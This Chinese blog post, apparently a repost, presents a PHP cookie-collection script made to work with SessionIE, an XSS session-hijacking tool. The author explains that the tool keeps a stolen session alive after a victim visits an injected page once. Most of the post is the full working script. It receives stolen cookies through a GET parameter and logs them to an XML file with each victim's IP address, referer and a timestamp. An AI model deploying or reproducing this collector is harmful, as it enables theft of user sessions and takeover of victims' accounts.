配合XSS工具SessionIE的php脚本

鬼仔注:SessionIE昨天 发过了

作者:云舒

我写的这个纯粹是好玩,没啥意思,说到底就是操作xml而已。缘起还是归结于前几天http://www.cncert.net在我们的邮件列表发布了一个新的xss利用工具,类似老外的hamster,在客户端定时刷新保持session不超时。被跨站的人只要访问一次之后,攻击者就可以一直保持登陆的状态。他这个工具用.net做的,为了方便,要求收集cookie的脚本把cookie保存为xml文件。他提供了一个asp程序,我只有php空间,因此写了个php的作测试用。
代码:

<?php

date_default_timezone_set("Asia/Chongqing");

$my_file = "cookie.xml";

if( ! isset( $_GET['x'] ) )
{
exit;
}

$my_cookie = $_GET['x'];
if( $_GET['x'] != "" )
{
if( ! file_exists( $my_file ) )
{
CreateXmlFile( );
}

AddData( $my_cookie );
}

function CreateXmlFile( )
{
global $my_file;

$fp = fopen( $my_file, "wb" );
if( ! $fp )
{
exit;
}

fwrite( $fp, "<?xml version=\"1.0\" encoding=\"gb2312\" ?>\n" );
fwrite( $fp, "<rss version=\"2.0\">\n" );
fwrite( $fp, "<treeroot>\n" );
fwrite( $fp, "</treeroot>\n" );
fwrite( $fp, "</rss>" );

fclose( $fp );
}

function AddData( $my_cookie )
{
global $my_file;

$doc = new DOMDocument( );
$doc->load( $my_file );
$doc->formatOutput = true;

$treeroot = $doc->getElementsBytagName( "treeroot" )->item(0);

$item = $doc->createElement( "item" );
$treeroot->appendChild( $item );

if( isset( $_SERVER["REMOTE_HOST"] ) )
{
$remote_host = $_SERVER["REMOTE_HOST"];
}
elseif( isset( $_SERVER["REMOTE_ADDR"] ) )
{
$remote_host = $_SERVER["REMOTE_ADDR"];
}
else
{
$remote_host = "NotCare";
}
$title = $doc->createElement( "title", $remote_host );
$item->appendChild( $title );

if( isset( $_SERVER["HTTP_REFERER"] ) )
{
$refer = $_SERVER["HTTP_REFERER"];
}
else
{
$refer = "http://yahoo.cn";
}
$link = $doc->createElement( "link", $refer );
$item->appendChild( $link );

$src_ip = $doc->createElement( "src_ip", $_SERVER["REMOTE_ADDR"] );
$item->appendChild( $src_ip );

$src_os = $doc->createElement( "src_os", "NotCare" );
$item->appendChild( $src_os );

$pubDate = $doc->createElement( "pubDate", date( "r" ) );
$item->appendChild( $pubDate );

$description = $doc->createElement( "description", $my_cookie );
$item->appendChild( $description );

$doc->save( $my_file );
}

?>

相关日志

发表评论